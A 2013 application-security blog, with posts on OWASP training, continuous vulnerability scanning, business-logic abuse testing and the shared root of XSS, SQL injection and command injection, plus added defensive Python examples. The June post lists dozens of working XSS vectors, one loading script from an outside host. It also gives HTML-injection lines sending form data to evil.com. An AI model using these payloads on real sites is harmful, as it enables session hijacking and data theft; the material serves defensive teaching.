Tuesday, October 29, 2013

RSA Europe 2013:

Our RSA Europe class was delivered yesterday in Amsterdam:
4 hours of defensive coding techniques.
It was good fun with about 100 fellow builders/breakers.

It was a great day with myself (Eoin Keary), Jim Manico and Ashar Javed (the king of XSS).

Our slides are here:
https://www.owasp.org/images/1/18/MASTER-RSA2013.pdf

Ashar's slides are here:
http://slid.es/mscasharjaved/cross-site-scripting-my-love

Wednesday, August 14, 2013

Vulnerability Management 101 - edgescan

Vulnerability Management:

The age-old penetration test is dead, long live the penetration test... So, as discussed before, a one-off penetration test does not work. Why?

  • Code changes - possible introduction of vulnerabilities
  • Framework vulnerabilities are discovered all the time (see here)
  • Server/hosting changes may give rise to a vulnerability
  • Patching - vulnerability
  • Logical/business logic vulnerability - from new features
  • etc etc

So, our one-off penetration test is only a point-in-time assessment. It has its place for deep-dive penetration tests, but more often than not the value of a one-off penetration test is eroded the day the report is finished... like driving a car out of a dealership, it loses half its value in an instant.

We decided to do something different..

How about a solution that provides...

  • Monthly or more frequent vulnerability assessments
  • Covers layers 1-7 (host, protocol, server, IP, patch, web app, framework etc etc)
  • Is manually verified by humans (not androids or monkeys!)
  • Integrates with many, many other security services
  • A single point to view your entire security posture across all OSI layers for your entire Internet presence

This type of idea makes sense, right?

We don't have experienced consultants running scans and chasing false positives.
We don't have 300 reports to manage while attempting to track what was fixed, how and when, not to mention risk priority.

Bring forth... edgescan

For the last year we have been developing a pretty decent vulnerability management tool.
It answers questions like:
  • What are my high-risk issues?
  • Where are my high-risk issues?
  • How old are they?
  • What is the vulnerability history for my assets?
  • Am I more or less secure than yesterday / last month / last year?
Some screenshots of edgescan, given a picture is worth 1000 words:

Executive Dashboard:
What are my biggest security concerns on the network and application layers? What is the history of each asset and what changes have occurred? The dashboard answers such questions.

Vulnerability List:
My to-do list!! Ordered by risk, date, asset etc etc. What do I need to remediate and which issues take a high priority? Also advice on how to fix discovered issues.

Asset List:
Each of my assets organised by criticality. A snapshot of each asset. Is it more secure than the last scheduled assessment? Are my issues in the network layer (administration/config) or the application layer (development/devops)?

Reporting:
Yes, you can download deep technical reports or executive-level reports on one or more assets if you wish. Select date ranges for historic reporting also.
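To make the "what is new, what was fixed, how old is it, am I better or worse than last month" bookkeeping concrete, here is an added example (my own illustration for this post, not edgescan code). It diffs two assessment snapshots of a small constructed estate. The snapshot layout, the severity weights, the asset names and the findings are all assumptions made for the example.

```python
"""Bookkeeping for a continuous vulnerability-management process.

Added example, not edgescan's code. Two assessment snapshots of the same
estate are compared to answer the questions the post lists: what is new,
what was fixed, how old are the open issues, and is the posture better or
worse than last time. Snapshot format, severity weights, asset names and
findings are all constructed for this example.
"""
from datetime import date

# Assumption: a simple ordinal risk weight per severity.
SEVERITY_WEIGHT = {"critical": 10, "high": 5, "medium": 2, "low": 1}


def finding_key(finding):
    """A finding is the same finding across assessments when asset, location
    and issue match; severity and dates may change and are not part of it."""
    return (finding["asset"], finding["location"], finding["issue"])


def risk_score(findings):
    """Risk-weighted sum over a set of findings."""
    return sum(SEVERITY_WEIGHT[f["severity"]] for f in findings)


def diff_snapshots(previous, current, today):
    """Compare two assessment snapshots taken on different dates."""
    prev = {finding_key(f): f for f in previous}
    curr = {finding_key(f): f for f in current}

    ages = {}
    for key, finding in curr.items():
        # Carry the first-seen date forward when the issue was already known,
        # so age is measured from discovery, not from the latest scan.
        first_seen = prev[key]["first_seen"] if key in prev else finding["first_seen"]
        ages[key] = (today - first_seen).days

    return {
        "new": sorted(curr.keys() - prev.keys()),
        "fixed": sorted(prev.keys() - curr.keys()),
        "open": sorted(curr.keys() & prev.keys()),
        "ages_days": ages,
        "current": curr,
        "score_previous": risk_score(prev.values()),
        "score_current": risk_score(curr.values()),
    }


def posture_trend(report):
    """'better', 'worse' or 'unchanged' relative to the previous assessment."""
    delta = report["score_current"] - report["score_previous"]
    return "unchanged" if delta == 0 else ("worse" if delta > 0 else "better")


def oldest_open(report, min_weight=5):
    """Open findings at or above a severity weight, oldest first:
    the 'how old are my high-risk issues?' view."""
    rows = [(report["ages_days"][key], key)
            for key, f in report["current"].items()
            if SEVERITY_WEIGHT[f["severity"]] >= min_weight]
    return sorted(rows, reverse=True)


# Constructed snapshots: the estate is one web host and one IP from TEST-NET.
PREVIOUS_SNAPSHOT = [  # assessment of 1 June 2013
    {"asset": "www.example.test", "location": "/search?q=", "issue": "Reflected XSS",
     "severity": "high", "first_seen": date(2013, 4, 2)},
    {"asset": "192.0.2.10", "location": "tcp/22", "issue": "Outdated SSH daemon",
     "severity": "medium", "first_seen": date(2013, 5, 1)},
    {"asset": "www.example.test", "location": "/login", "issue": "Session cookie lacks HttpOnly",
     "severity": "low", "first_seen": date(2013, 5, 1)},
]
CURRENT_SNAPSHOT = [  # assessment of 1 July 2013; the scanner only knows today's date
    {"asset": "www.example.test", "location": "/search?q=", "issue": "Reflected XSS",
     "severity": "high", "first_seen": date(2013, 7, 1)},
    {"asset": "192.0.2.10", "location": "tcp/22", "issue": "Outdated SSH daemon",
     "severity": "medium", "first_seen": date(2013, 7, 1)},
    {"asset": "www.example.test", "location": "/account?id=", "issue": "Horizontal authorization bypass",
     "severity": "critical", "first_seen": date(2013, 7, 1)},
]


def run_example():
    return diff_snapshots(PREVIOUS_SNAPSHOT, CURRENT_SNAPSHOT, date(2013, 7, 1))


if __name__ == "__main__":
    report = run_example()
    print("new:", report["new"])
    print("fixed:", report["fixed"])
    print("trend:", posture_trend(report), report["score_previous"], "->", report["score_current"])
    print("oldest high-risk:", oldest_open(report))
```

The one design point worth noting is the first-seen carry-over: if every monthly scan re-stamps an issue with the scan date, "how old is it?" is always answered with "a few days", which is exactly the blind spot a one-off test leaves you with.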
 
 





Wednesday, June 19, 2013

XSS Vectors:
Some from OWASP, some from other places...

%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%2F%74%75%72%74%6C%65%73%2F%29%3B%3C%2F%73%63%72%69%70%74%3E
>"><script>alert("XSS")</script>&
<body background="javascript: alert()">"><STYLE>@import"javascript:alert('XSS')";</STYLE>
>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)>
<script>alert(1)</script>
'</title><script>alert(1)<script>'</title>
<!-- lorem ipsem --><script>alert(1)<script>-->
<FOO><![CDATA[]]><script>alert(1)</script>]]>
<input type=text name=foo value=a><script>alert(1)<script>>
<input type=text name=foo value=a/><script>alert(1)<script>>
<input type=text name=foo value=""onevent=?//">

"><bgsound src="javascript: alert()">"><iframe src="javascript: alert()"></iframe>
</textarea><iframe src="javascript: alert()"></iframe>
</textarea><bgsound src="javascript: alert()">
<script> var foo="";alert(1);//";
<script> var foo='';alert(1);//'
<sCrIpT>alert('eoin');</ScRiPt>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC="jav&#x09;ascript:alert('XSS');">
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
#<img/src=%22%22onerror=alert(1)>
<img/src=""onerror=alert(123)>
<a" href" onclick=alert(123)>foo</a>
<a"" href=""onclick=alert(123)>foo</a>
<img%0a%0dsrc=""%0a%0donerror=alert(123)>
<input type=text name=foo value=a%20onchange=alert(123)>
<input type="text" name="foo" value=""onmouseover=alert(123)//">
<input type='text' name='foo' value=''onclick=alert(123)//'>
<input type="text" name="foo" value=""autofocus/onfocus=alert(123)//">
<a href="data:text/html,<script>alert(123)</script>">foo</a>
<script src="data:,alert(123)"></script>
<script src="data:application/x-javascript,alert(123)"></script>
<script src="data:text/javascript,alert(123)"></script>
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCg5KTwvc2NyaXB0Pg">foo</a>
<script src="data:;base64,YWxlcnQoOSk"></script>
<a href="data:text/html;charset=utf-16,%ff%fe%3cscript%3ealert(9)</script>">foo</a>
<svg onload="javascript:alert(123)" xmlns="http://www.w3.org/2000/svg"></svg>
<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(123)"></g></svg>
<svg><script xlink:href=data:,alert(123)></script>
<svg xmlns="http://www.w3.org/2000/svg"><a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:alert(123)"><rect width="1000" height="1000" fill="white"/></a></svg>
<script%0a%0dalert(123)</script>
<script%20<!--%20-->alert(123)</script>
<a href=""&<img&amp;/onclick=alert(123)>foo</a>
<a""id=a href="onclick=alert(123)>foo</a>
<a href=""&amp;/onclick=alert(123)>foo</a>
<script/id="a">alert(123)</script>
<img src=">"onerror=alert(123)>
<img id="><"class="><"src=">"onerror=alert(123)>
<img src="\"a=">"onerror=alert(123)>
<a id=' href="">'href=javascript:alert(123)>foo</a>
<a id='href=http://web.site/'onclick=alert(123)>foo</a>
<a href= . '"\' onclick=alert(123) '"'>foo</a>
<img src="\"'<a href='">"'onerror=alert(123)>
<a id='http://web.site/'onclick=alert(123)<!--href=a>foo</a>-->
<img src="'"id='<img src="">'onerror=alert(123)>
<img src="<img src='<img src=.>'>"onerror=alert(123)>
<a href=javascript:alert(123) href href=" href="">foo</a>
var a = "foo"+alert(123)//";
var a = "foo"&&alert(123)//";
var a = "foo"/alert(123)//";
(function(){alert(123)})()
window["alert"](123)
String.fromCharCode(0x61,0x62)
alert(/foo bar/.source)
window[/alert/.source](123)
angular.bind(self, alert, 123)()
angular.element.apply(alert(123))
Ember.run(null, alert, 123)
_.defer(alert, 123)
"+alert(123)//
"&&alert(123)//
"/alert(123)//
/foo bar/.source
/alert/.source
">, alert(123)<iframe/src=http://xssed.com>alert(123)</scrihttp://pt>alert(123)
">, '></div>alert(123)<input><script>alert(123)</script></marquee>alert(123)">
>">, </p>alert(123)<marquee><script>alert(123)</script></title>alert(123)
"/>, </ScRiPt>alert(123)<title><script>alert(123)</script></SCRIPT>alert(123)
>">, </form>alert(123)<b><script>alert(123)</script></input>alert(123)" t type="hidden" />

 
 
HTML Injection Vectors (Anti-CSP):

Non-truncated single quote:
Steals the HTML following the injection point until another single quote is encountered.

<img src='http://evil.com/log.do?

<base> jumping:
Can be used to reroute forms that do not use absolute action paths.
Does not work in IE (it obeys the W3C rule that <base> belongs in <head>).

<base href='http://evil.com/'> <!-- injected code -->

Form rerouting:
Forms can't be nested. Injecting a form before the legitimate form reroutes the legitimate form's fields to the injected destination.

<form action='http://evil.com/log.do'> <!-- Injected script -->
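None of these three vectors needs script, so CSP does not stop them; the fix is the same output encoding that stops XSS, plus looking at what your pages actually render. As an added example (not from the original post), the small auditor below walks a rendered response and flags a <base> element, a form whose action points off your own hosts, a second <form> opened inside the first, and an attribute value that has swallowed markup (the unterminated-quote trick). The trusted host list, the evil.example host and the sample page are constructed for the example.

```python
"""Audit rendered HTML for script-less injection patterns that CSP does not
block: a <base> element, an off-site form action, a nested <form>, and a
quoted attribute that has swallowed the markup that follows it.

Added example, not from the original post. The trusted hosts, the
evil.example host and the sample response are constructed.
"""
from html.parser import HTMLParser
from urllib.parse import urlsplit


class MarkupInjectionAuditor(HTMLParser):
    """Collects findings as (kind, value, line) tuples while parsing."""

    def __init__(self, trusted_hosts):
        super().__init__()
        self.trusted_hosts = set(trusted_hosts)
        self.findings = []
        self.open_forms = 0

    def _offsite(self, url):
        # Relative URLs have no host and stay on the current origin.
        host = urlsplit(url or "").hostname
        return host is not None and host not in self.trusted_hosts

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        line = self.getpos()[0]
        if tag == "base":
            # A page that never emits <base> itself should treat any one as
            # injected: it rewrites every relative URL, form actions included.
            self.findings.append(("base-tag", attrs.get("href"), line))
        if tag == "form":
            action = attrs.get("action")
            if self.open_forms:
                # Forms cannot nest; the browser drops this one and its fields
                # post to whichever form was opened first.
                self.findings.append(("nested-form", action, line))
            if self._offsite(action):
                self.findings.append(("offsite-form-action", action, line))
            self.open_forms += 1
        for name, value in attrs.items():
            # An unterminated quote makes the following markup part of the
            # attribute value; a '<' inside a value is the tell-tale sign.
            if value and "<" in value:
                self.findings.append(("markup-in-attribute", f"{tag} {name}", line))

    def handle_endtag(self, tag):
        if tag == "form" and self.open_forms:
            self.open_forms -= 1


def audit_html(document, trusted_hosts):
    """Return the list of findings for one rendered response."""
    auditor = MarkupInjectionAuditor(trusted_hosts)
    auditor.feed(document)
    auditor.close()
    return auditor.findings


# Constructed response: a legitimate transfer page with the base-jumping and
# form-rerouting lines from above dropped into the body ahead of the real form.
SAMPLE_RESPONSE = """<html><head><title>Transfer</title></head>
<body>
<p>Hello <b>alice</b></p>
<base href='http://evil.example/'>
<form action='http://evil.example/log.do'>
<form action='/transfer' method='post'>
<input name='amount'><input type='submit' value='Send'>
</form>
</body></html>"""


def run_example():
    return audit_html(SAMPLE_RESPONSE, trusted_hosts={"bank.example"})


if __name__ == "__main__":
    for kind, value, line in run_example():
        print(f"line {line}: {kind}: {value}")
```

Run this over the HTML your templates produce for a page that contains user-controlled text; a clean page yields an empty list, and each of the three vectors above shows up as its own finding.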

 

Wednesday, May 22, 2013



Cyber Security and Ireland


Ireland is not an island... As many of you know I am passionate about how we as a country secure the systems, networks and the critical elements of our national infrastructure that we all depend on.

I was recently interviewed by the Irish Examiner for an article, Cyber Crime: The New Battleground, that they ran on the threat posed to Ireland by criminals and others with malicious intent.

To be honest, criminals go where the money is. I don't think the GDP of an individual country matters, given we throw funding at security but nothing seems to improve too much.

Nation state attackers may be more conscious of geographic location for obvious reasons, but overall it's all just copper wire, IP numbers and 1's and 0's.



Thursday, April 18, 2013

Breaking Bad - Business Logic Abuse.

There was a recent discussion on the OWASP Testing Guide list, a project I used to lead, in relation to "How to test for business logic issues".

This is a real tough one to document in terms of "How to...".

In saying that, some of the biggest simulated financial fraud attacks I have ever committed for clients were based around business logic and authorization logic attacks.

So how do we do it?

This is how I see the world; you may or may not agree.
I look at an app's functionality as a finite state machine.
Certain inputs make the machine transition to a different state. Some states can only be reached from certain other states. Certain states are idempotent and others are transactional and have a permanent impact.

We have a number of use cases to test this machine.

1. Positive use case - App does what it is meant to (positive sense)
2. Negative use case - App does what it is meant to (negative sense)
3. Abuse case - User or data is trying to force the app to do stuff it was not meant to do.

#3 above can be further broken down:
3a: App's logic is broken by abuse: the app is forced to skip, ignore or revert certain state conditions - breaking out of the state transition model. Forceful browsing, wizard bouncing etc.
3b: App's logic is broken by supplying it with data it did not expect. The app reacts, and its state machine is broken by reacting in a certain way.
3c: App processes data, albeit out of range or in the wrong format, and produces a useful result.

So we have a couple of types of test in order to break business logic:
Data manipulation (3b) - confusing the app's state based on input data.
State transition attacks (3a) - break the app's transition model by sending it requests out of sequence, for example.
Data range attacks (3c) -
In many cases breaking the business logic of an application can be a combination of 3a and 3b above.

You say Tomato, I say Tomato (advice for QA and developers):

  1. Build your test cases for positive data flow for business-positive outcomes.
  2. Build your test cases for positive data flow for business-negative outcomes - access denied, insufficient funds etc.
  3. Build your expected error condition test cases.
  4. Build your test cases for each stateful condition the function can be in.
  5. Map out state transitions from one state to another.

Reverse Polarity - introduce some chaos......

Build abuse test cases for positive business outcomes (1): remove, add, corrupt, reverse input to the function. Can you achieve a positive business outcome without obeying the state model, or without supplying the function all the appropriate data?

Do the same with the negative outcomes (2).

Can we get the application to throw unexpected errors by breaking the assumptions of the state model?

Can we skip state transitions (A->B->C: can we go from A->C or C->B)?

Break roles - become somebody!

Vertical:
Role Based Access Control is great for vertical sandboxing of functionality. Well-designed systems do not need to expose role-based decisions to the client, and such data does not need to go outside of the zone of trust (the server session state).

Horizontal:
This is generally less thought out. For some reason we obsess over RBAC.
Peer user types accessing each other's information. Generally, testing such controls yields returns. Such controls are critical in social networking environments: 100,000s of peer users interacting in a complex discretionary-access-control-modelled environment.
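An added example (not from the original post) that turns the above into code: a checkout flow as a finite state machine with an explicit transition table, and the abuse cases 3a, 3b and 3c plus the horizontal-access check driven against it. The states, prices and user names are constructed for the example.

```python
"""Checkout flow as a finite state machine, with the post's abuse cases run
against it: out-of-sequence requests (3a), unexpected data (3b), out-of-range
data (3c) and a peer user touching another user's order (horizontal access).
Added example, not from the original post; states, amounts and users are constructed.
"""
from decimal import Decimal, InvalidOperation

# States one valid request may move an order to. CONFIRMED is transactional
# and terminal: nothing leads back out of it.
TRANSITIONS = {"CART": {"ADDRESS"}, "ADDRESS": {"PAYMENT", "CART"},
               "PAYMENT": {"CONFIRMED", "ADDRESS"}, "CONFIRMED": set()}


class LogicError(Exception): pass      # request does not fit the state model or carries bad data
class AccessDenied(Exception): pass    # order belongs to another user


def parse_amount(value):
    """3b/3c: accept only a finite, positive amount with at most two decimals."""
    try:
        amount = Decimal(str(value))
    except InvalidOperation:
        raise LogicError("amount is not a number") from None
    if (not amount.is_finite() or amount <= 0 or amount > Decimal("1000000")
            or amount != amount.quantize(Decimal("0.01"))):
        raise LogicError("amount out of range")
    return amount


class Shop:
    def __init__(self):
        self.orders = {}  # order_id -> {"owner", "state", "items"}

    def create_order(self, user):
        order_id = len(self.orders) + 1
        self.orders[order_id] = {"owner": user, "state": "CART", "items": []}
        return order_id

    def _load(self, user, order_id):
        # Horizontal control: ownership is decided server-side on every request,
        # from the session user, never from anything the client sends.
        order = self.orders.get(order_id)
        if order is None or order["owner"] != user:
            raise AccessDenied(f"{user} may not access order {order_id}")
        return order

    @staticmethod
    def _transition(order, new_state):
        # 3a: refuse any move the state model does not list.
        if new_state not in TRANSITIONS[order["state"]]:
            raise LogicError(f"{order['state']} -> {new_state} is not a valid transition")
        order["state"] = new_state

    def add_item(self, user, order_id, sku, price):
        order = self._load(user, order_id)
        if order["state"] != "CART":
            raise LogicError("items can only be added in CART")
        order["items"].append((sku, parse_amount(price)))

    def set_address(self, user, order_id, address):
        order = self._load(user, order_id)
        if not order["items"]:
            raise LogicError("cannot ship an empty cart")
        self._transition(order, "ADDRESS")  # check the move before mutating anything
        order["address"] = address

    def start_payment(self, user, order_id):
        self._transition(self._load(user, order_id), "PAYMENT")

    def confirm(self, user, order_id, paid):
        order = self._load(user, order_id)
        total = sum((price for _, price in order["items"]), Decimal("0"))
        if parse_amount(paid) != total:
            raise LogicError("paid amount does not match the order total")
        self._transition(order, "CONFIRMED")


def attempt(action, *args):
    """Run one abuse case and record whether the control held."""
    try:
        action(*args)
        return "allowed"
    except (LogicError, AccessDenied) as exc:
        return f"blocked: {exc}"


def run_abuse_cases():
    shop = Shop()
    oid = shop.create_order("alice")
    results = {
        "3a skip CART->PAYMENT": attempt(shop.start_payment, "alice", oid),
        "3b non-numeric price": attempt(shop.add_item, "alice", oid, "BOOK", "9.99;DROP"),
        "3c negative price": attempt(shop.add_item, "alice", oid, "BOOK", "-9.99"),
    }
    # The positive path that the abuse cases are measured against.
    shop.add_item("alice", oid, "BOOK", "9.99")
    shop.set_address("alice", oid, "1 Main Street")
    shop.start_payment("alice", oid)
    results["horizontal: bob confirms alice's order"] = attempt(shop.confirm, "bob", oid, "9.99")
    results["3c underpay"] = attempt(shop.confirm, "alice", oid, "0.01")
    shop.confirm("alice", oid, "9.99")
    results["3a revert from CONFIRMED"] = attempt(shop.set_address, "alice", oid, "elsewhere")
    results["final state"] = shop.orders[oid]["state"]
    return results


if __name__ == "__main__":
    for case, outcome in run_abuse_cases().items():
        print(f"{case}: {outcome}")
```

The transition table is the whole point: once the allowed moves are written down, "can we go from A to C?" becomes a test you can run on every build rather than a question a tester asks once.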














Tuesday, March 12, 2013

RSA 2013 San Francisco.

Below is the link to our OWASP training at RSA on the 24th Feb 2013.
Myself (@eoinkeary) and Jim Manico (@manicode) delivered a 4-hour session to 400 developers, pen testers etc.
It was fun.

OWASP Slides RSA2013

Tuesday, January 8, 2013

XSS = SQLI = CMDi=?

Why do we look at Cross Site Scripting, Command Injection and SQL injection in different ways?

Why am I even writing about such old issues like SQLI, XSS, CMDi? Probably because they are very similar from a builder/prevention aspect but very different from a breaker/defender aspect.

The result is different:

Cross Site Scripting (XSS): is a payload delivery mechanism. The vulnerability is used to deliver the payload (warhead), in this case client-side script which does something. The attack is used against a user so the attacker can do other stuff: malware upload, social engineering, identity theft etc.

Command Injection (CMDi): A direct attack on a system. Invoking system commands directly. Command injection is a payload attack as opposed to a delivery mechanism.

SQL Injection (SQLI): A direct attack on a system also. Direct access to data or system configuration. The SQL injection attack is also a payload attack.

The root cause is the same. It all comes down to the same thing:

Mixing up input data with source code / system commands
OR
Breaking out of the data context into the execution context.

XSS causes the browser to execute user-supplied input as code. The input breaks out of the "data" context and becomes execution context.

SQLI causes the database, or the source code calling the database, to confuse data [context] and ANSI SQL [execution context]. Command injection mixes up the data [context] and the command [context].
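The same point in code, as an added example (not from the original post): each pair below puts the "mix data into code" version beside the "keep data as data" version, for SQL, HTML and a system command. The users table, the host names and the untrusted inputs are constructed; the HTML input is the plain <script>alert(1)</script> vector from the June list.

```python
"""The three injections from the post side by side. Each 'unsafe' function
builds code by concatenating untrusted data into it; each 'safe' function
keeps the data in a data channel (bound parameter, encoded text, argv element).

Added example, not from the original post; the sample table, host names and
untrusted inputs are constructed.
"""
import html
import re
import sqlite3

# Constructed untrusted inputs: one breakout for each context.
UNTRUSTED_SQL = "' OR '1'='1"
UNTRUSTED_HTML = "<script>alert(1)</script>"
UNTRUSTED_HOST = "example.test; id"


def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", [("alice", "user"), ("bob", "admin")])
    return conn


def find_user_unsafe(conn, name):
    # Data spliced into the SQL text: a quote in the input ends the string
    # literal and the rest of the input is parsed as SQL (execution context).
    query = "SELECT name, role FROM users WHERE name = '" + name + "'"
    return conn.execute(query).fetchall()


def find_user_safe(conn, name):
    # Bound parameter: the driver sends the value separately from the
    # statement, so it can only be compared against, never parsed.
    return conn.execute("SELECT name, role FROM users WHERE name = ?", (name,)).fetchall()


def render_unsafe(name):
    # Data spliced into HTML: '<' in the input starts a tag for the browser.
    return "<p>Hello " + name + "</p>"


def render_safe(name):
    # Output encoding for the HTML text context: the significant characters
    # become entities and the browser renders them as text.
    return "<p>Hello " + html.escape(name, quote=True) + "</p>"


def ping_command_unsafe(host):
    # One string destined for a shell: ';' in the input splits it into two commands.
    return "ping -c 1 " + host


HOSTNAME = re.compile(r"^[A-Za-z0-9.-]{1,253}$")


def is_hostname(value):
    return bool(HOSTNAME.match(value))


def ping_command_safe(host):
    # Argument vector plus an allowlist: the host is one argv element rather
    # than shell syntax, and anything outside hostname characters is rejected.
    if not is_hostname(host):
        raise ValueError("not a hostname: " + repr(host))
    return ["ping", "-c", "1", host]


def demo():
    conn = build_db()
    return {
        "sql_unsafe_rows": len(find_user_unsafe(conn, UNTRUSTED_SQL)),
        "sql_safe_rows": len(find_user_safe(conn, UNTRUSTED_SQL)),
        "html_unsafe": render_unsafe(UNTRUSTED_HTML),
        "html_safe": render_safe(UNTRUSTED_HTML),
        "cmd_unsafe": ping_command_unsafe(UNTRUSTED_HOST),
        "cmd_safe": ping_command_safe("example.test"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

The unsafe command builder is shown but never handed to a shell here; the point is visible from the string it produces. Notice that the fix is never "filter out bad characters": it is choosing an API (parameters, an encoder, an argv list) in which the data cannot change what the code means.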



One problem I see is breakers trying to explain to builders a vulnerability, or a number of different vulnerabilities, all of which the builder treats in a similar way (logically), but it all sounds highly complex.

Unless security consultants communicate in "builder-speak" I don't see how this communication can be effective.

"Hey [builder guy], you have a couple of XSS's in your DOM and also some stored XSS. Coupled with some SQLI, some CSRF and some click-jacking"...... who exactly is expected to understand that?

In builder-speak:

"Hey [builder guy], some of the untrusted input which you render back to the user can cause a client-side security issue. You need to encode all input from untrusted sources so the browser does not mistake it for code.
You also have a similar issue on your data layer. You need to parameterize untrusted input so it is not confused with code and executed, resulting in unexpected issues.
You have some logical issues in relation to how browsers work, where requests can be sent on your behalf by using your session. Also, best not to let your site be iframed unless you intend it to be this way, as it can be used to dupe your clients into doing things they never intended to do."

- which is easier to understand (assuming you are not a security expert)?